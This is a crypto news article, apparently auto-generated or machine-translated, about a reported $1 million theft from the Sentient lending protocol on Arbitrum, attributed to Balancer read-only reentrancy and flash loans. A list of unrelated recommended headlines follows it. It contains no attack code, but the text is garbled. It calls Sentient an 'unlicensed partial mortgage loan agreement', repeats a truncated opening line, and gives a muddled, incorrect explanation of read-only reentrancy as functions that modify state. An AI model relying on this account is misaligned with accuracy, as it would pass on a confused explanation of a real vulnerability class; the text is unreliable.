Sentient Lost $1 Million Due to Balancer’s Read-Only and Reentrant Nature on Arbitrum Network
On April 5th, according to PeckShield monitoring, Sentient, an unlicensed partial mortgage loan agreement, was stolen about $1 million on the Arbitrum network e
On April 5th, according to PeckShield monitoring, Sentient, an unlicensed partial mortgage loan agreement, was stolen about $1 million on the Arbitrum network early this morning. The root cause is the read-only and reentrant nature of Balancer.
Security team: Sentient loan agreement stolen $1 million on the Arbitrum network
On April 5th, PeckShield monitoring reported that Sentient, an unlicensed partial mortgage loan agreement, was stolen about $1 million on the Arbitrum network in the early hours of the morning. The root cause of the theft was the read-only and reentrant nature of Balancer. In this article, we will explore this incident in detail and understand what Balancer is and how its nature contributed to the theft.
What is Balancer?
Balancer is a programmable liquidity platform that allows users to create liquidity pools for trading assets. It can be thought of as a self-balancing index fund for cryptocurrencies. It operates on the Ethereum network and uses smart contracts to execute its functionality. Balancer allows users to create custom pools, set fees for trading, and earn rewards for providing liquidity. It also supports several cryptocurrencies, including ETH, USDT, and USDC.
How does Balancer’s Read-Only and Reentrant Nature Affect Security?
Read-only and reentrant functions are a standard part of smart contract programming. They allow other functions within the same contract to read and/or modify state variables within the contract. However, when not used correctly, they can lead to several security vulnerabilities.
In the case of Balancer, a read-only and reentrant vulnerability in its smart contract allowed the attackers to drain Sentient’s funds. Attackers exploited the vulnerability by using flash loans, a type of uncollateralized loan that is borrowed and repaid within the same transaction, to manipulate the liquidity pools. They were also able to create multiple recursive transactions to confuse the smart contract and continue the attack, draining more funds.
Lessons Learned
The Sentient incident highlights several critical security issues within DeFi protocols. The first lesson is the importance of thorough auditing of smart contracts before deployment. This incident exposed a flaw in Balancer’s code, which could have been identified before the attack, ultimately preventing the theft. Secondly, the vulnerability in Balancer was relatively simple to fix, but it highlights how even small oversights can lead to significant impacts on users’ funds. Lastly, the incident reinforces the need for non-custodial wallet security, such as hardware wallets, and the importance of proper storage and handling of private keys.
Conclusion
Sentient’s theft on the Arbitrum network was a significant incident that highlighted the importance of smart contract auditing, DeFi protocol vulnerability, and wallet security. The read-only and reentrant function’s vulnerability in Balancer was the root cause of this hack, which led to the theft of $1 million in funds. It is essential to understand the implications of these security issues as we continue to integrate DeFi protocols within our financial systems.
—
FAQs
#What steps can be taken to prevent similar attacks in the future?
Proper auditing of smart contracts, implementing fixes for known vulnerabilities, using secure wallet storage and handling techniques, and educating users about security best practices are all critical steps that can prevent similar attacks in the future.
#What other DeFi protocols are vulnerable to similar attacks?
Unfortunately, any DeFi protocol that uses smart contracts is susceptible to similar attacks. Hence all DeFi protocols need to conduct regular security audits to identify and remove any vulnerabilities.
#How can users protect themselves from such attacks?
Users can protect themselves by using non-custodial wallets like hardware wallets, keeping their private keys safe, avoiding unverified smart contract interactions, and keeping themselves updated about the latest security risks and best practices.
This article and pictures are from the Internet and do not represent aiwaka's position. If you infringe, please contact us to delete:https://www.aiwaka.com/2023/04/05/sentient-lost-1-million-due-to-balancers-read-only-and-reentrant-nature-on-arbitrum-network/
It is strongly recommended that you study, review, analyze and verify the content independently, use the relevant data and content carefully, and bear all risks arising therefrom.
Recommended articles
-
Temporary Disruption on Polygon Network Resolved through Node Resynchronization
On February 23, according to the news that PolygonScan, the blockchain browser, did not update its data for a long time in the early morning of this day, the o…
-
Why can’t Okex borrow coins (Okex cannot borrow coins)
Why can\’t Okex borrow coins? According to the official website of Okex, if a us
-
The Future Industry: Prospective Arrangements for Leading Development
It is reported that Jin Zhuanglong, Minister of the Ministry of Industry and Information Technology, said that the future industry would be prospectively arran…
-
Understanding the April Attacks: A Deep Dive into Losses and Impacts
On April 30th, according to CertiK Alert data, the April attacks have caused a total of approximately $103.6 million in losses, including approximately $19.8 million in losses caus
-
Arbitrum Foundation, AdamBack, Lido, and DYDX: The Blockchain Technologies Revolutionizing Digital Finance
21:00-7:00 Keywords: Arbitrum Foundation, AdamBack, Lido, DYDX
Overview of important developments overnight on April 3rd
As the technology continues to evolve, we have more and mor -
Uniswap V3 secures copyright protection for core code
It is reported that Uniswap V3 applied for a two-year copyright commercial protection for its core code before it was launched on the main Ethereum network in M
-
The Upcoming Ethereum Network Upgrade and Its Implications
On April 12th, according to the Tokenview browser page, there are still 16 hours left before the Shanghai upgrade. The Shanghai upgrade plan will be launched on
-
What is the BTC module (BTC Embedded)?
The BTC module, also known as BTC Embedded, is a decentralized protocol supporte
-
Data: BlockTower Capital transferred 3.31 million YGGs to Coin An again
According to reports, according to Twitter user ember monitoring, BlockTower Capital (the label on the block browser plug-in shows \”MetaDockTeam\”) unlocked and
-
Base announces “Build on Base” bounty winners as Percent AI, Rhinestone, and Inheritable
On March 21st, Coinbase Layer 2 Network Base announced the winner of the \”Build on Base\” 15000 USD DC bounty from ETH Driver BUIDLathon, including Decent AI, Rh